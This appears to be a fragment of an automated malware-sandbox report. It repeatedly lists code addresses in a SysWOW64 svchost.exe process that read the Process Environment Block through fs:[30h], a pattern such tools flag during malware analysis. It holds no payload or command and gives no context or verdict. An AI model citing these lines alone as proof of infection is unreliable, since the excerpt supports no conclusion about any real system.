            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]	2_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]	2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]	2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]	2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]	2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]	2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D0539D mov eax, dword ptr fs:[00000030h]	2_2_03D0539D
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C8739A mov eax, dword ptr fs:[00000030h]	2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C8739A mov eax, dword ptr fs:[00000030h]	2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]	2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]	2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]	2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C533A5 mov eax, dword ptr fs:[00000030h]	2_2_03C533A5
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C633A0 mov eax, dword ptr fs:[00000030h]	2_2_03C633A0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C633A0 mov eax, dword ptr fs:[00000030h]	2_2_03C633A0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]	2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2D34C mov eax, dword ptr fs:[00000030h]	2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2D34C mov eax, dword ptr fs:[00000030h]	2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D05341 mov eax, dword ptr fs:[00000030h]	2_2_03D05341
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C29353 mov eax, dword ptr fs:[00000030h]	2_2_03C29353
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C29353 mov eax, dword ptr fs:[00000030h]	2_2_03C29353
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]	2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]	2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]	2_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEF367 mov eax, dword ptr fs:[00000030h]	2_2_03CEF367
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]	2_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C37370 mov eax, dword ptr fs:[00000030h]	2_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C37370 mov eax, dword ptr fs:[00000030h]	2_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C37370 mov eax, dword ptr fs:[00000030h]	2_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB930B mov eax, dword ptr fs:[00000030h]	2_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB930B mov eax, dword ptr fs:[00000030h]	2_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB930B mov eax, dword ptr fs:[00000030h]	2_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]	2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]	2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]	2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]	2_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]	2_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF132D mov eax, dword ptr fs:[00000030h]	2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF132D mov eax, dword ptr fs:[00000030h]	2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5F32A mov eax, dword ptr fs:[00000030h]	2_2_03C5F32A
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C27330 mov eax, dword ptr fs:[00000030h]	2_2_03C27330
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]	2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]	2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]	2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]	2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]	2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]	2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]	2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C392C5 mov eax, dword ptr fs:[00000030h]	2_2_03C392C5
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C392C5 mov eax, dword ptr fs:[00000030h]	2_2_03C392C5
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]	2_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]	2_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]	2_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5F2D0 mov eax, dword ptr fs:[00000030h]	2_2_03C5F2D0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5F2D0 mov eax, dword ptr fs:[00000030h]	2_2_03C5F2D0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED mov eax, dword ptr fs:[00000030h]	2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]	2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]	2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]	2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D052E2 mov eax, dword ptr fs:[00000030h]	2_2_03D052E2
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEF2F8 mov eax, dword ptr fs:[00000030h]	2_2_03CEF2F8
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C292FF mov eax, dword ptr fs:[00000030h]	2_2_03C292FF
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]	2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]	2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]	2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]	2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05283 mov eax, dword ptr fs:[00000030h]2_2_03D05283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6329E mov eax, dword ptr fs:[00000030h]2_2_03C6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6329E mov eax, dword ptr fs:[00000030h]2_2_03C6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A0 mov eax, dword ptr fs:[00000030h]2_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A0 mov eax, dword ptr fs:[00000030h]2_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A0 mov eax, dword ptr fs:[00000030h]2_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A0 mov eax, dword ptr fs:[00000030h]2_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF92A6 mov eax, dword ptr fs:[00000030h]2_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF92A6 mov eax, dword ptr fs:[00000030h]2_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF92A6 mov eax, dword ptr fs:[00000030h]2_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF92A6 mov eax, dword ptr fs:[00000030h]2_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC72A0 mov eax, dword ptr fs:[00000030h]2_2_03CC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC72A0 mov eax, dword ptr fs:[00000030h]2_2_03CC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB92BC mov eax, dword ptr fs:[00000030h]2_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB92BC mov eax, dword ptr fs:[00000030h]2_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB92BC mov ecx, dword ptr fs:[00000030h]2_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB92BC mov ecx, dword ptr fs:[00000030h]2_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29240 mov eax, dword ptr fs:[00000030h]2_2_03C29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29240 mov eax, dword ptr fs:[00000030h]2_2_03C29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6724D mov eax, dword ptr fs:[00000030h]2_2_03C6724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]2_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEB256 mov eax, dword ptr fs:[00000030h]2_2_03CEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEB256 mov eax, dword ptr fs:[00000030h]2_2_03CEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]2_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFD26B mov eax, dword ptr fs:[00000030h]2_2_03CFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFD26B mov eax, dword ptr fs:[00000030h]2_2_03CFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]2_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C59274 mov eax, dword ptr fs:[00000030h]2_2_03C59274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C71270 mov eax, dword ptr fs:[00000030h]2_2_03C71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C71270 mov eax, dword ptr fs:[00000030h]2_2_03C71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C67208 mov eax, dword ptr fs:[00000030h]2_2_03C67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C67208 mov eax, dword ptr fs:[00000030h]2_2_03C67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05227 mov eax, dword ptr fs:[00000030h]2_2_03D05227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]2_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6D1D0 mov eax, dword ptr fs:[00000030h]2_2_03C6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6D1D0 mov ecx, dword ptr fs:[00000030h]2_2_03C6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D051CB mov eax, dword ptr fs:[00000030h]2_2_03D051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C551EF mov eax, dword ptr fs:[00000030h]2_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C351ED mov eax, dword ptr fs:[00000030h]2_2_03C351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD71F9 mov esi, dword ptr fs:[00000030h]2_2_03CD71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]2_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]2_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]2_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C87190 mov eax, dword ptr fs:[00000030h]2_2_03C87190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE11A4 mov eax, dword ptr fs:[00000030h]2_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE11A4 mov eax, dword ptr fs:[00000030h]2_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE11A4 mov eax, dword ptr fs:[00000030h]2_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE11A4 mov eax, dword ptr fs:[00000030h]2_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B0 mov eax, dword ptr fs:[00000030h]2_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05152 mov eax, dword ptr fs:[00000030h]2_2_03D05152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29148 mov eax, dword ptr fs:[00000030h]2_2_03C29148
